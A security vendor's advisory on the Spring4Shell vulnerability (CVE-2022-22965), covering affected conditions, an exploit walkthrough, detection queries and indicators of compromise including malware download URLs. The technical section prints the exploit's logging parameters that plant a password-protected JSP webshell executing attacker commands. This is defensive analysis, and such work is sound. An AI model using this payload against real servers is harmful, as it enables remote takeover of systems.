Securonix Threat Labs Initial Coverage Advisory: Detection and Analysis of Spring4Shell RCE (CVE-2022-22965)

By Securonix Threat Labs, Threat Research

Introduction

The Securonix Threat Research team has identified a currently unpatched zero-day vulnerability in Spring Core, a widely used Java-based platform with cross platform support.  Early details claim that the bug would allow full remote code execution (RCE) to affected systems. In this analysis, we will determine the scope and impact of the Spring4Shell vulnerability, as well as mitigation and detection strategies.

 

Spring is in the air…

The Spring framework or “Spring” is an open source platform which allows organizations to develop and push enterprise applications. As it is Java-based, the framework has the ability to run on almost any popular operating system including Windows and Linux. 

This particular vulnerability targets the “Spring-beans” package, in particular the files “spring-beans.*.jar” or “CachedIntrospectionResults.class” files contained in the framework. 

Details of the vulnerability are still coming to light, and there are many speculating that this could be as significant as the next Log4j vulnerability. As we’ll uncover during our analysis phase, while both leverage RCE (MITRE: T1210) as the primary tactic, the Spring4Shell vulnerability differs as it requires a much more specific environment. Log4j was a Java package baked into many popular applications including Elastic, Ghidra, and even Minecraft. Spring, while popular, is an application framework which does not always host serviceable applications.

 

Scope of Impact

While the Spring framework is wildly popular, upon initial investigation, there appear to be several factors required for successful exploitation. 

First, as mentioned earlier, the affected Spring-beans files need to be present and leveraged by an application that would allow external access such as Apache Tomcat. Next, the Java JDK version of the running application needs to be at least version 9. At the time of publication, affected Spring core versions are all under 5.3.17.

Check your system for Java version and vulnerable filenames using the following commands:

Java version:

  • # java -version

Affected files:

  • # find / -name spring-beans*.jar
  • # find / -name CachedIntrospectionResuLts.class

 

Exploit in Action: Technical Analysis

The exploit works in two parts, one by how Plain Old Java Objects (POJO)  are called and by taking advantage of the misuse of parameter binding inside the Spring-beans package. These parameters can be assigned and then called using reflection, get (getters) or set (setters). These parameters can then have their properties be cached, which writes to the local file system.  

We see this in action in the Spring framework:

In this example, we can then make a call that will be processed by this controller for example:

curl ‘http[:]//host/form?companyName=somename’

Knowing this, the cache can then be called using the getCachedIntrospectionResults() function contained in BeanWrapperImpl.java.

One example of how to leverage this cache maliciously, would be to tell Tomcat “how to log” by feeding it a set of parameters or property types. 

This week, a proof of concept (PoC) code written in Python was released which leverages this technique by controlling the data flow by feeding in these parameters simply through the URL of the affected website (hence the RCE) portion of the exploit.

The Python PoC makes five unique requests building the cache that can be used by an attacker to make system commands.

Cleaning this up a bit, we can see each individual cached object and its parameters we’re using to construct the .jsp exploit which will effectively give us a password-protected webshell:

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i if(“j”.equals(request.getParameter(“pwd”))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter(“cmd”)).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}

class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp

class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT

class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar

class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

The “pattern” parameter contains the expected variables that an attacker would use when calling the exploit. Suffix, being the file extension, directory, where the .jsp file will sit in relation to the exploitable web app. The prefix would be the filename, and lastly fileDateFormat is simply ignored.  

Once executed, the file “tomcatwar.jsp” is constructed and the attacker can call it from a web browser or using terminal commands such as curl. 

Since we’re now able to execute remote commands on the target machine, we can now aim for a full on reverse shell for full control over the target:

 

Securonix Detection and Mitigation of Spring4Shell

Now that we understand a bit more about how the exploit works, let’s shift gears and discuss how we can defend against the new Spring4Shell exploit.

First, determine if you are in fact vulnerable. If you leverage the Spring framework in your organization, determine first the Java version and search for the String-beans package as mentioned earlier.

Since this vulnerability is still unpatched, we can’t recommend updating to the latest version. If all the criteria for the exploit is met, determine access to such systems and mitigate as necessary.

Lastly, look for signs of past compromise by inspecting Tomcat directory structure for .jsp files that are not expected.

Log Sources Needed for Spring4Shell Detection

The Spring4shell vulnerability can be detected by the following log sources:

  • Sysmon4Linux (Process Creation)
  • Next Generation Firewall (URL Field)
  • Osquery (File Creation)
  • Webserver logs
  • IDS/IPS logs

Detection Policies

  • Possible Java Application Webshell Process Creation Analytic
  • SpringShell PoC Query Parameters Analytic
  • Possible Java Application Webshell Process Creation Analytic
  • Possible Webshell File Creation Analytic
  • Possible SpringShell Exploitation Attempt URLs Access Analytic

Hunting Queries

Title: Possible Java Application Webshell Process Creation Analytic

Omega_id: UNX-SYM14-ERI

index=activity AND rg_functionality = “Unix / Linux / AIX” AND baseeventid = “1” AND sourceprocessname ENDS WITH “java” | rare  destinationprocessname transactionstring1

Title: SpringShell PoC Query Parameters Analytic

Omega_id: PXY-PAN48-RUN

index=activity AND (rg_functionality = “Next Generation Firewall” OR rg_functionality = “Web Application Firewall” OR rg_functionality = “Web Server” OR rg_functionality = “Web Proxy”) AND (requesturl CONTAINS “.jsp?cmd=” OR requesturl CONTAINS “.jsp?pwd=” OR requesturl CONTAINS “&cmd=”)

Title: Possible Java Application Webshell Process Creation Analytic

Omega_id: EDR-SYM350-ERI

index=activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity: Launched”) AND sourceprocessname ENDS WITH “java.exe” | rare  destinationprocessname transactionstring1

Title: SpringShell PoC Query Parameters Analytic

index=activity AND (rg_functionality = “Next Generation Firewall” OR rg_functionality = “Web Application Firewall” OR rg_functionality = “Web Server” OR rg_functionality = “Web Proxy”) AND requesturl CONTAINS “class.module.classLoader.resources.context.parent.pipeline.first”

Spring4Shell Indicators of Compromise

https://github.com/Securonix/AutonomousThreatSweeper/tree/main/Spring4Shell

Note: These related indicators of compromise (IoCs) have not yet been validated by Securonix Threat Labs, and have been provided as beta IoCs of low confidence until otherwise stated. 

IP Address 

149.28.147.15 

103.214.146.5 

158.247.202.6 

38.83.79.203 

183.193.45.80 

103.214.146.5 

45.67.230.64 

URL 

http://45.67.230.64/kinsing 

http://45.67.230.64/pg2.sh 

http://45.67.230.64/pg.sh 

http://45.67.230.64/wb.xml 

Domain 

dns.1433.eu.org

Updated: April 4, 2022

References:

[1]: Spring Framework Git: https://github.com/spring-projects/spring-framework\

[2]: Confirmed vulnerability announcement: https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement

[3]: Published CVE: https://tanzu.vmware.com/security/cve-2022-22965